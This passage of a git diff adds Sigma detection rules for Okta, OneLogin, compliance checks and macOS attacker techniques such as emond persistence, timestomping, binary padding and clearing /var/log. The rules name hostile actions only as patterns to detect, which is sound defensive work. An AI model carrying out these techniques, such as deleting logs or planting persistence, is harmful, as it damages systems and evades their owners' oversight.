https://developer.okta.com/docs/reference/api/event-types/ +logsource: + product: okta + service: okta +detection: + selection: + eventtype: + - application.policy.sign_on.update + - application.policy.sign_on.rule.delete + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Unknown diff --git a/bin/main/rules/others_cloud/okta/okta_mfa_reset_or_deactivated.yml b/bin/main/rules/others_cloud/okta/okta_mfa_reset_or_deactivated.yml new file mode 100644 index 000000000..48d0ac8fc --- /dev/null +++ b/bin/main/rules/others_cloud/okta/okta_mfa_reset_or_deactivated.yml @@ -0,0 +1,24 @@ +title: Okta MFA Reset or Deactivated +id: 50e068d7-1e6b-4054-87e5-0a592c40c7e0 +description: Detects when an attempt at deactivating or resetting MFA. +author: Austin Songer @austinsonger +status: experimental +date: 2021/09/21 +modified: 2021/09/22 +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + product: okta + service: okta +detection: + selection: + eventtype: + - user.mfa.factor.deactivate + - user.mfa.factor.reset_all + condition: selection +level: medium +tags: + - attack.persistence +falsepositives: + - If a MFA reset or deactivated was performed by a system administrator. diff --git a/bin/main/rules/others_cloud/okta/okta_network_zone_deactivated_or_deleted.yml b/bin/main/rules/others_cloud/okta/okta_network_zone_deactivated_or_deleted.yml new file mode 100644 index 000000000..f0d5aa802 --- /dev/null +++ b/bin/main/rules/others_cloud/okta/okta_network_zone_deactivated_or_deleted.yml @@ -0,0 +1,24 @@ +title: Okta Network Zone Deactivated or Deleted +id: 9f308120-69ed-4506-abde-ac6da81f4310 +description: Detects when an Network Zone is Deactivated or Deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/09/12 +modified: 2021/09/22 +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + product: okta + service: okta +detection: + selection: + eventtype: + - zone.deactivate + - zone.delete + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Unknown diff --git a/bin/main/rules/others_cloud/okta/okta_policy_modified_or_deleted.yml b/bin/main/rules/others_cloud/okta/okta_policy_modified_or_deleted.yml new file mode 100644 index 000000000..bfca326f5 --- /dev/null +++ b/bin/main/rules/others_cloud/okta/okta_policy_modified_or_deleted.yml @@ -0,0 +1,26 @@ +title: Okta Policy Modified or Deleted +id: 1667a172-ed4c-463c-9969-efd92195319a +description: Detects when an Okta policy is modified or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/09/12 +modified: 2021/09/22 +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + product: okta + service: okta +detection: + selection: + eventtype: + - policy.lifecycle.update + - policy.lifecycle.delete + condition: selection +level: low +tags: + - attack.impact +falsepositives: + - Okta Policies being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Okta Policies modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. diff --git a/bin/main/rules/others_cloud/okta/okta_policy_rule_modified_or_deleted.yml b/bin/main/rules/others_cloud/okta/okta_policy_rule_modified_or_deleted.yml new file mode 100644 index 000000000..7a1d4fe6d --- /dev/null +++ b/bin/main/rules/others_cloud/okta/okta_policy_rule_modified_or_deleted.yml @@ -0,0 +1,24 @@ +title: Okta Policy Rule Modified or Deleted +id: 0c97c1d3-4057-45c9-b148-1de94b631931 +description: Detects when an Policy Rule is Modified or Deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/09/12 +modified: 2021/09/22 +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + product: okta + service: okta +detection: + selection: + eventtype: + - policy.rule.update + - policy.rule.delete + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Unknown diff --git a/bin/main/rules/others_cloud/okta/okta_security_threat_detected.yml b/bin/main/rules/others_cloud/okta/okta_security_threat_detected.yml new file mode 100644 index 000000000..02bb71925 --- /dev/null +++ b/bin/main/rules/others_cloud/okta/okta_security_threat_detected.yml @@ -0,0 +1,21 @@ +title: Okta Security Threat Detected +id: 5c82f0b9-3c6d-477f-a318-0e14a1df73e0 +description: Detects when an security threat is detected in Okta. +author: Austin Songer @austinsonger +status: experimental +date: 2021/09/12 +modified: 2021/09/22 +references: + - https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + product: okta + service: okta +detection: + selection: + eventtype: security.threat.detected + condition: selection +level: medium +falsepositives: + - Unknown diff --git a/bin/main/rules/others_cloud/okta/okta_unauthorized_access_to_app.yml b/bin/main/rules/others_cloud/okta/okta_unauthorized_access_to_app.yml new file mode 100644 index 000000000..c9ce5ab4d --- /dev/null +++ b/bin/main/rules/others_cloud/okta/okta_unauthorized_access_to_app.yml @@ -0,0 +1,22 @@ +title: Okta Unauthorized Access to App +id: 6cc2b61b-d97e-42ef-a9dd-8aa8dc951657 +description: Detects when unauthorized access to app occurs. +author: Austin Songer @austinsonger +status: experimental +date: 2021/09/12 +modified: 2021/09/22 +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + product: okta + service: okta +detection: + selection: + displaymessage: User attempted unauthorized access to app + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - User might of believe that they had access. diff --git a/bin/main/rules/others_cloud/okta/okta_user_account_locked_out.yml b/bin/main/rules/others_cloud/okta/okta_user_account_locked_out.yml new file mode 100644 index 000000000..21b4c7ed2 --- /dev/null +++ b/bin/main/rules/others_cloud/okta/okta_user_account_locked_out.yml @@ -0,0 +1,22 @@ +title: Okta User Account Locked Out +id: 14701da0-4b0f-4ee6-9c95-2ffb4e73bb9a +description: Detects when an user account is locked out. +author: Austin Songer @austinsonger +status: experimental +date: 2021/09/12 +modified: 2021/09/22 +references: + - https://developer.okta.com/docs/reference/api/system-log/ + - https://developer.okta.com/docs/reference/api/event-types/ +logsource: + product: okta + service: okta +detection: + selection: + displaymessage: Max sign in attempts exceeded + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Unknown diff --git a/bin/main/rules/others_cloud/onelogin/onelogin_assumed_another_user.yml b/bin/main/rules/others_cloud/onelogin/onelogin_assumed_another_user.yml new file mode 100644 index 000000000..4180492a2 --- /dev/null +++ b/bin/main/rules/others_cloud/onelogin/onelogin_assumed_another_user.yml @@ -0,0 +1,21 @@ +title: OneLogin User Assumed Another User +id: 62fff148-278d-497e-8ecd-ad6083231a35 +description: Detects when an user assumed another user account. +author: Austin Songer @austinsonger +status: experimental +date: 2021/10/12 +modified: 2021/10/12 +references: + - https://developers.onelogin.com/api-docs/1/events/event-resource +logsource: + product: onelogin + service: onelogin.events +detection: + selection: + event_type_id: 3 + condition: selection +level: low +tags: + - attack.impact +falsepositives: + - Unknown diff --git a/bin/main/rules/others_cloud/onelogin/onelogin_user_account_locked.yml b/bin/main/rules/others_cloud/onelogin/onelogin_user_account_locked.yml new file mode 100644 index 000000000..a97b70d15 --- /dev/null +++ b/bin/main/rules/others_cloud/onelogin/onelogin_user_account_locked.yml @@ -0,0 +1,25 @@ +title: OneLogin User Account Locked +id: a717c561-d117-437e-b2d9-0118a7035d01 +description: Detects when an user acount is locked or suspended. +author: Austin Songer @austinsonger +status: experimental +date: 2021/10/12 +modified: 2021/10/12 +references: + - https://developers.onelogin.com/api-docs/1/events/event-resource/ +logsource: + product: onelogin + service: onelogin.events +detection: + selection1: # Locked via API + event_type_id: 532 + selection2: # Locked via API + event_type_id: 553 + selection3: # Suspended via API + event_type_id: 551 + condition: 1 of selection* +level: low +tags: + - attack.impact +falsepositives: + - System may lock or suspend user accounts. diff --git a/bin/main/rules/others_compliance/default_credentials_usage.yml b/bin/main/rules/others_compliance/default_credentials_usage.yml new file mode 100644 index 000000000..c224c84d9 --- /dev/null +++ b/bin/main/rules/others_compliance/default_credentials_usage.yml @@ -0,0 +1,109 @@ +title: Default Credentials Usage +id: 1a395cbc-a84a-463a-9086-ed8a70e573c7 +status: stable +description: Before deploying any new asset, change all default passwords to have values consistent with administrative level accounts. Sigma detects default credentials + usage. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management. +author: Alexandr Yampolskyi, SOC Prime +references: + - https://www.cisecurity.org/controls/cis-controls-list/ + - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf + - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf + - https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists +date: 2019/03/26 +logsource: + product: qualys +detection: + selection: + host.scan.vuln: + - 10693 + - 11507 + - 11633 + - 11804 + - 11821 + - 11847 + - 11867 + - 11931 + - 11935 + - 11950 + - 12541 + - 12558 + - 12559 + - 12560 + - 12562 + - 12563 + - 12565 + - 12587 + - 12590 + - 12599 + - 12702 + - 12705 + - 12706 + - 12907 + - 12928 + - 12929 + - 13053 + - 13178 + - 13200 + - 13218 + - 13241 + - 13253 + - 13274 + - 13296 + - 13301 + - 13327 + - 13373 + - 13374 + - 13409 + - 13530 + - 13532 + - 20065 + - 20073 + - 20081 + - 27202 + - 27358 + - 38702 + - 38719 + - 42045 + - 42417 + - 43029 + - 43220 + - 43221 + - 43222 + - 43223 + - 43225 + - 43246 + - 43431 + - 43484 + - 86857 + - 87098 + - 87106 + condition: selection +falsepositives: + - Unknown +level: medium +# tags: + # - CSC4 + # - CSC4.2 + # - NIST CSF 1.1 PR.AC-4 + # - NIST CSF 1.1 PR.AT-2 + # - NIST CSF 1.1 PR.MA-2 + # - NIST CSF 1.1 PR.PT-3 + # - ISO 27002-2013 A.9.1.1 + # - ISO 27002-2013 A.9.2.2 + # - ISO 27002-2013 A.9.2.3 + # - ISO 27002-2013 A.9.2.4 + # - ISO 27002-2013 A.9.2.5 + # - ISO 27002-2013 A.9.2.6 + # - ISO 27002-2013 A.9.3.1 + # - ISO 27002-2013 A.9.4.1 + # - ISO 27002-2013 A.9.4.2 + # - ISO 27002-2013 A.9.4.3 + # - ISO 27002-2013 A.9.4.4 + # - PCI DSS 3.2 2.1 + # - PCI DSS 3.2 7.1 + # - PCI DSS 3.2 7.2 + # - PCI DSS 3.2 7.3 + # - PCI DSS 3.2 8.1 + # - PCI DSS 3.2 8.2 + # - PCI DSS 3.2 8.3 + # - PCI DSS 3.2 8.7 diff --git a/bin/main/rules/others_compliance/firewall_cleartext_protocols.yml b/bin/main/rules/others_compliance/firewall_cleartext_protocols.yml new file mode 100644 index 000000000..dcaf8405e --- /dev/null +++ b/bin/main/rules/others_compliance/firewall_cleartext_protocols.yml @@ -0,0 +1,85 @@ +title: Cleartext Protocol Usage +id: d7fb8f0e-bd5f-45c2-b467-19571c490d7e +status: stable +description: Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels. Ensure that an encryption + is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access. +author: Alexandr Yampolskyi, SOC Prime +date: 2019/03/26 +modified: 2021/11/23 +references: + - https://www.cisecurity.org/controls/cis-controls-list/ + - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf + - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf +logsource: + category: firewall +detection: + selection1: + dst_port: + - 8080 + - 21 + - 80 + - 23 + - 50000 + - 1521 + - 27017 + - 3306 + - 1433 + - 11211 + - 15672 + - 5900 + - 5901 + - 5902 + - 5903 + - 5904 + selection2: + action: + - forward + - accept + - 2 + condition: selection1 and selection2 +falsepositives: + - Unknown +level: low +# tags: + # - CSC4 + # - CSC4.5 + # - CSC14 + # - CSC14.4 + # - CSC16 + # - CSC16.5 + # - NIST CSF 1.1 PR.AT-2 + # - NIST CSF 1.1 PR.MA-2 + # - NIST CSF 1.1 PR.PT-3 + # - NIST CSF 1.1 PR.AC-1 + # - NIST CSF 1.1 PR.AC-4 + # - NIST CSF 1.1 PR.AC-5 + # - NIST CSF 1.1 PR.AC-6 + # - NIST CSF 1.1 PR.AC-7 + # - NIST CSF 1.1 PR.DS-1 + # - NIST CSF 1.1 PR.DS-2 + # - ISO 27002-2013 A.9.2.1 + # - ISO 27002-2013 A.9.2.2 + # - ISO 27002-2013 A.9.2.3 + # - ISO 27002-2013 A.9.2.4 + # - ISO 27002-2013 A.9.2.5 + # - ISO 27002-2013 A.9.2.6 + # - ISO 27002-2013 A.9.3.1 + # - ISO 27002-2013 A.9.4.1 + # - ISO 27002-2013 A.9.4.2 + # - ISO 27002-2013 A.9.4.3 + # - ISO 27002-2013 A.9.4.4 + # - ISO 27002-2013 A.8.3.1 + # - ISO 27002-2013 A.9.1.1 + # - ISO 27002-2013 A.10.1.1 + # - PCI DSS 3.2 2.1 + # - PCI DSS 3.2 8.1 + # - PCI DSS 3.2 8.2 + # - PCI DSS 3.2 8.3 + # - PCI DSS 3.2 8.7 + # - PCI DSS 3.2 8.8 + # - PCI DSS 3.2 1.3 + # - PCI DSS 3.2 1.4 + # - PCI DSS 3.2 4.3 + # - PCI DSS 3.2 7.1 + # - PCI DSS 3.2 7.2 + # - PCI DSS 3.2 7.3 diff --git a/bin/main/rules/others_compliance/group_modification_logging.yml b/bin/main/rules/others_compliance/group_modification_logging.yml new file mode 100644 index 000000000..703ccfdb6 --- /dev/null +++ b/bin/main/rules/others_compliance/group_modification_logging.yml @@ -0,0 +1,61 @@ +title: Group Modification Logging +id: 9cf01b6c-e723-4841-a868-6d7f8245ca6e +status: stable +description: 'Configure systems to issue a log entry and alert when an account is added to or removed from any group assigned administrative privileges. Sigma detects\ + \ Event ID 4728 indicates a \u2018Member is added to a Security Group\u2019. Event ID 4729 indicates a \u2018Member is removed from a Security enabled-group\u2019\ + . Event ID 4730 indicates a\u2018Security Group is deleted\u2019. The case is not applicable for Unix OS. Supported OS - Windows 2008 R2 and 7, Windows 2012 R2\ + \ and 8.1, Windows 2016 and 10 Windows Server 2019, Windows Server 2000, Windows 2003 and XP.' +author: Alexandr Yampolskyi, SOC Prime +date: 2019/03/26 +references: + - https://www.cisecurity.org/controls/cis-controls-list/ + - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf + - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf + - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728 + - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4729 + - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730 + - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=633 + - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632 + - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634 +logsource: + product: windows + service: security +detection: + selection: + EventID: + - 4728 + - 4729 + - 4730 + - 633 + - 632 + - 634 + condition: selection +falsepositives: + - Unknown +level: low +# tags: + # - CSC4 + # - CSC4.8 + # - NIST CSF 1.1 PR.AC-4 + # - NIST CSF 1.1 PR.AT-2 + # - NIST CSF 1.1 PR.MA-2 + # - NIST CSF 1.1 PR.PT-3 + # - ISO 27002-2013 A.9.1.1 + # - ISO 27002-2013 A.9.2.2 + # - ISO 27002-2013 A.9.2.3 + # - ISO 27002-2013 A.9.2.4 + # - ISO 27002-2013 A.9.2.5 + # - ISO 27002-2013 A.9.2.6 + # - ISO 27002-2013 A.9.3.1 + # - ISO 27002-2013 A.9.4.1 + # - ISO 27002-2013 A.9.4.2 + # - ISO 27002-2013 A.9.4.3 + # - ISO 27002-2013 A.9.4.4 + # - PCI DSS 3.2 2.1 + # - PCI DSS 3.2 7.1 + # - PCI DSS 3.2 7.2 + # - PCI DSS 3.2 7.3 + # - PCI DSS 3.2 8.1 + # - PCI DSS 3.2 8.2 + # - PCI DSS 3.2 8.3 + # - PCI DSS 3.2 8.7 diff --git a/bin/main/rules/others_compliance/host_without_firewall.yml b/bin/main/rules/others_compliance/host_without_firewall.yml new file mode 100644 index 000000000..ae9a76a72 --- /dev/null +++ b/bin/main/rules/others_compliance/host_without_firewall.yml @@ -0,0 +1,31 @@ +title: Host Without Firewall +id: 6b2066c8-3dc7-4db7-9db0-6cc1d7b0dde9 +status: stable +description: Host Without Firewall. Alert means not complied. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management. +author: Alexandr Yampolskyi, SOC Prime +date: 2019/03/19 +modified: 2021/05/30 +references: + - https://www.cisecurity.org/controls/cis-controls-list/ + - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf + - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf +logsource: + product: qualys +detection: + selection: + event.category: Security Policy + host.scan.vuln_name: Firewall Product Not Detected* + condition: selection +level: low +# tags: + # - CSC9 + # - CSC9.4 + # - NIST CSF 1.1 PR.AC-5 + # - NIST CSF 1.1 PR.AC-6 + # - NIST CSF 1.1 PR.AC-7 + # - NIST CSF 1.1 DE.AE-1 + # - ISO 27002-2013 A.9.1.2 + # - ISO 27002-2013 A.13.2.1 + # - ISO 27002-2013 A.13.2.2 + # - ISO 27002-2013 A.14.1.2 + # - PCI DSS 3.2 1.4 diff --git a/bin/main/rules/others_compliance/netflow_cleartext_protocols.yml b/bin/main/rules/others_compliance/netflow_cleartext_protocols.yml new file mode 100644 index 000000000..6bb172cd8 --- /dev/null +++ b/bin/main/rules/others_compliance/netflow_cleartext_protocols.yml @@ -0,0 +1,79 @@ +title: Cleartext Protocol Usage +id: 7e4bfe58-4a47-4709-828d-d86c78b7cc1f +status: stable +description: Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels. Ensure that an encryption + is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access. +author: Alexandr Yampolskyi, SOC Prime +date: 2019/03/26 +references: + - https://www.cisecurity.org/controls/cis-controls-list/ + - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf + - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf +# tags: + # - CSC4 + # - CSC4.5 + # - CSC14 + # - CSC14.4 + # - CSC16 + # - CSC16.5 + # - NIST CSF 1.1 PR.AT-2 + # - NIST CSF 1.1 PR.MA-2 + # - NIST CSF 1.1 PR.PT-3 + # - NIST CSF 1.1 PR.AC-1 + # - NIST CSF 1.1 PR.AC-4 + # - NIST CSF 1.1 PR.AC-5 + # - NIST CSF 1.1 PR.AC-6 + # - NIST CSF 1.1 PR.AC-7 + # - NIST CSF 1.1 PR.DS-1 + # - NIST CSF 1.1 PR.DS-2 + # - ISO 27002-2013 A.9.2.1 + # - ISO 27002-2013 A.9.2.2 + # - ISO 27002-2013 A.9.2.3 + # - ISO 27002-2013 A.9.2.4 + # - ISO 27002-2013 A.9.2.5 + # - ISO 27002-2013 A.9.2.6 + # - ISO 27002-2013 A.9.3.1 + # - ISO 27002-2013 A.9.4.1 + # - ISO 27002-2013 A.9.4.2 + # - ISO 27002-2013 A.9.4.3 + # - ISO 27002-2013 A.9.4.4 + # - ISO 27002-2013 A.8.3.1 + # - ISO 27002-2013 A.9.1.1 + # - ISO 27002-2013 A.10.1.1 + # - PCI DSS 3.2 2.1 + # - PCI DSS 3.2 8.1 + # - PCI DSS 3.2 8.2 + # - PCI DSS 3.2 8.3 + # - PCI DSS 3.2 8.7 + # - PCI DSS 3.2 8.8 + # - PCI DSS 3.2 1.3 + # - PCI DSS 3.2 1.4 + # - PCI DSS 3.2 4.3 + # - PCI DSS 3.2 7.1 + # - PCI DSS 3.2 7.2 + # - PCI DSS 3.2 7.3 +logsource: + service: netflow +detection: + selection: + destination.port: + - 8080 + - 21 + - 80 + - 23 + - 50000 + - 1521 + - 27017 + - 1433 + - 11211 + - 3306 + - 15672 + - 5900 + - 5901 + - 5902 + - 5903 + - 5904 + condition: selection +falsepositives: + - Unknown +level: low diff --git a/bin/main/rules/others_compliance/workstation_was_locked.yml b/bin/main/rules/others_compliance/workstation_was_locked.yml new file mode 100644 index 000000000..3c679197e --- /dev/null +++ b/bin/main/rules/others_compliance/workstation_was_locked.yml @@ -0,0 +1,46 @@ +title: Locked Workstation +id: 411742ad-89b0-49cb-a7b0-3971b5c1e0a4 +status: stable +description: Automatically lock workstation sessions after a standard period of inactivity. The case is not applicable for Unix OS. Supported OS - Windows 2008 R2 + and 7, Windows 2012 R2 and 8.1, Windows 2016 and 10 Windows Server 2019. +author: Alexandr Yampolskyi, SOC Prime +date: 2019/03/26 +references: + - https://www.cisecurity.org/controls/cis-controls-list/ + - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf + - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf + - https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800 +logsource: + product: windows + service: security +detection: + selection: + EventID: 4800 + condition: selection +falsepositives: + - Unknown +level: low +# tags: + # - CSC16 + # - CSC16.11 + # - ISO27002-2013 A.9.1.1 + # - ISO27002-2013 A.9.2.1 + # - ISO27002-2013 A.9.2.2 + # - ISO27002-2013 A.9.2.3 + # - ISO27002-2013 A.9.2.4 + # - ISO27002-2013 A.9.2.5 + # - ISO27002-2013 A.9.2.6 + # - ISO27002-2013 A.9.3.1 + # - ISO27002-2013 A.9.4.1 + # - ISO27002-2013 A.9.4.3 + # - ISO27002-2013 A.11.2.8 + # - PCI DSS 3.1 7.1 + # - PCI DSS 3.1 7.2 + # - PCI DSS 3.1 7.3 + # - PCI DSS 3.1 8.7 + # - PCI DSS 3.1 8.8 + # - NIST CSF 1.1 PR.AC-1 + # - NIST CSF 1.1 PR.AC-4 + # - NIST CSF 1.1 PR.AC-6 + # - NIST CSF 1.1 PR.AC-7 + # - NIST CSF 1.1 PR.PT-3 diff --git a/bin/main/rules/others_macos/file_event/file_event_macos_emond_launch_daemon.yml b/bin/main/rules/others_macos/file_event/file_event_macos_emond_launch_daemon.yml new file mode 100644 index 000000000..834ba05d5 --- /dev/null +++ b/bin/main/rules/others_macos/file_event/file_event_macos_emond_launch_daemon.yml @@ -0,0 +1,27 @@ +title: MacOS Emond Launch Daemon +id: 23c43900-e732-45a4-8354-63e4a6c187ce +status: test +description: Detects additions to the Emond Launch Daemon that adversaries may use to gain persistence and elevate privileges. +author: Alejandro Ortuno, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md + - https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 +date: 2020/10/23 +modified: 2021/11/27 +logsource: + category: file_event + product: macos +detection: + selection_1: + TargetFilename|contains: '/etc/emond.d/rules/' + TargetFilename|endswith: '.plist' + selection_2: + TargetFilename|contains: '/private/var/db/emondClients/' + condition: selection_1 or selection_2 +falsepositives: + - Legitimate administration activities +level: medium +tags: + - attack.persistence + - attack.privilege_escalation + - attack.t1546.014 diff --git a/bin/main/rules/others_macos/file_event/file_event_macos_startup_items.yml b/bin/main/rules/others_macos/file_event/file_event_macos_startup_items.yml new file mode 100644 index 000000000..e87e5b6db --- /dev/null +++ b/bin/main/rules/others_macos/file_event/file_event_macos_startup_items.yml @@ -0,0 +1,25 @@ +title: Startup Items +id: dfe8b941-4e54-4242-b674-6b613d521962 +status: test +description: Detects creation of startup item plist files that automatically get executed at boot initialization to establish persistence. +author: Alejandro Ortuno, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md +date: 2020/10/14 +modified: 2021/11/27 +logsource: + category: file_event + product: macos +detection: + selection_1: + TargetFilename|contains: '/Library/StartupItems/' + selection_2: + TargetFilename|endswith: '.plist' + condition: selection_1 and selection_2 +falsepositives: + - Legitimate administration activities +level: low +tags: + - attack.persistence + - attack.privilege_escalation + - attack.t1037.005 diff --git a/bin/main/rules/others_macos/process_creation/proc_creation_macos_applescript.yml b/bin/main/rules/others_macos/process_creation/proc_creation_macos_applescript.yml new file mode 100644 index 000000000..1c4308a70 --- /dev/null +++ b/bin/main/rules/others_macos/process_creation/proc_creation_macos_applescript.yml @@ -0,0 +1,23 @@ +title: MacOS Scripting Interpreter AppleScript +id: 1bc2e6c5-0885-472b-bed6-be5ea8eace55 +status: test +description: Detects execution of AppleScript of the macOS scripting language AppleScript. +author: Alejandro Ortuno, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md +date: 2020/10/21 +modified: 2021/11/27 +logsource: + category: process_creation + product: macos +detection: + selection: + Image|endswith: '/osascript' + CommandLine|contains: '-e' + condition: selection +falsepositives: + - Application installers might contain scripts as part of the installation process. +level: medium +tags: + - attack.execution + - attack.t1059.002 diff --git a/bin/main/rules/others_macos/process_creation/proc_creation_macos_base64_decode.yml b/bin/main/rules/others_macos/process_creation/proc_creation_macos_base64_decode.yml new file mode 100644 index 000000000..dd1a3dc4e --- /dev/null +++ b/bin/main/rules/others_macos/process_creation/proc_creation_macos_base64_decode.yml @@ -0,0 +1,23 @@ +title: Decode Base64 Encoded Text +id: 719c22d7-c11a-4f2c-93a6-2cfdd5412f68 +status: test +description: Detects usage of base64 utility to decode arbitrary base64-encoded text +author: Daniil Yugoslavskiy, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md +date: 2020/10/19 +modified: 2021/11/27 +logsource: + category: process_creation + product: macos +detection: + selection: + Image: '/usr/bin/base64' + CommandLine|contains: '-d' + condition: selection +falsepositives: + - Legitimate activities +level: low +tags: + - attack.defense_evasion + - attack.t1027 diff --git a/bin/main/rules/others_macos/process_creation/proc_creation_macos_binary_padding.yml b/bin/main/rules/others_macos/process_creation/proc_creation_macos_binary_padding.yml new file mode 100644 index 000000000..107d98437 --- /dev/null +++ b/bin/main/rules/others_macos/process_creation/proc_creation_macos_binary_padding.yml @@ -0,0 +1,28 @@ +title: 'Binary Padding' +id: 95361ce5-c891-4b0a-87ca-e24607884a96 +status: test +description: 'Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detect using dd and truncate to add a junk data to file.' +author: 'Igor Fits, Mikhail Larin, oscd.community' +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md +date: 2020/10/19 +modified: 2021/11/27 +logsource: + product: macos + category: process_creation +detection: + selection1: + Image|endswith: '/truncate' + CommandLine|contains: '-s' + selection2: + Image|endswith: '/dd' + CommandLine|contains: 'if=' + filter: + CommandLine|contains: 'of=' + condition: selection1 or (selection2 and not filter) +falsepositives: + - Legitimate script work +level: high +tags: + - attack.defense_evasion + - attack.t1027.001 diff --git a/bin/main/rules/others_macos/process_creation/proc_creation_macos_change_file_time_attr.yml b/bin/main/rules/others_macos/process_creation/proc_creation_macos_change_file_time_attr.yml new file mode 100644 index 000000000..508f26f03 --- /dev/null +++ b/bin/main/rules/others_macos/process_creation/proc_creation_macos_change_file_time_attr.yml @@ -0,0 +1,28 @@ +title: 'File Time Attribute Change' +id: 88c0f9d8-30a8-4120-bb6b-ebb54abcf2a0 +status: test +description: 'Detect file time attribute change to hide new or changes to existing files.' +author: 'Igor Fits, Mikhail Larin, oscd.community' +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md +date: 2020/10/19 +modified: 2021/11/27 +logsource: + product: macos + category: process_creation +detection: + selection1: + Image|endswith: '/touch' + selection2: + CommandLine|contains: + - '-t' + - '-acmr' + - '-d' + - '-r' + condition: selection1 and selection2 +falsepositives: + - Unknown +level: medium +tags: + - attack.defense_evasion + - attack.t1070.006 diff --git a/bin/main/rules/others_macos/process_creation/proc_creation_macos_clear_system_logs.yml b/bin/main/rules/others_macos/process_creation/proc_creation_macos_clear_system_logs.yml new file mode 100644 index 000000000..0c554bba2 --- /dev/null +++ b/bin/main/rules/others_macos/process_creation/proc_creation_macos_clear_system_logs.yml @@ -0,0 +1,28 @@ +title: Indicator Removal on Host - Clear Mac System Logs +id: acf61bd8-d814-4272-81f0-a7a269aa69aa +status: experimental +description: Detects deletion of local audit logs +author: remotephone, oscd.community +date: 2020/10/11 +modified: 2021/11/11 +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md +logsource: + product: macos + category: process_creation +detection: + selection1: + Image|endswith: '/rm' + selection2: + CommandLine|contains: '/var/log' + selection3: + CommandLine|contains|all: + - '/Users/' + - '/Library/Logs/' + condition: selection1 and (selection2 or selection3) +falsepositives: + - Legitimate administration activities +level: medium +tags: + - attack.defense_evasion + - attack.t1070.002 diff --git a/bin/main/rules/others_macos/process_creation/proc_creation_macos_create_account.yml b/bin/main/rules/others_macos/process_creation/proc_creation_macos_create_account.yml new file mode 100644 index 000000000..a000b5eb8 --- /dev/null +++ b/bin/main/rules/others_macos/process_creation/proc_creation_macos_create_account.yml @@ -0,0 +1,23 @@ +title: Creation Of A Local User Account +id: 51719bf5-e4fd-4e44-8ba8-b830e7ac0731 +status: test +description: Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system. +author: Alejandro Ortuno, oscd.community +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md +date: 2020/10/06 +modified: 2021/11/27 +logsource: + category: process_creation + product: macos +detection: + selection: + Image|endswith: '/dscl' + CommandLine|contains: 'create' + condition: selection +falsepositives: + - Legitimate administration activities +level: low +tags: + - attack.t1136.001 + - attack.persistence diff --git a/bin/main/rules/others_macos/process_creation/proc_creation_macos_create_hidden_account.yml 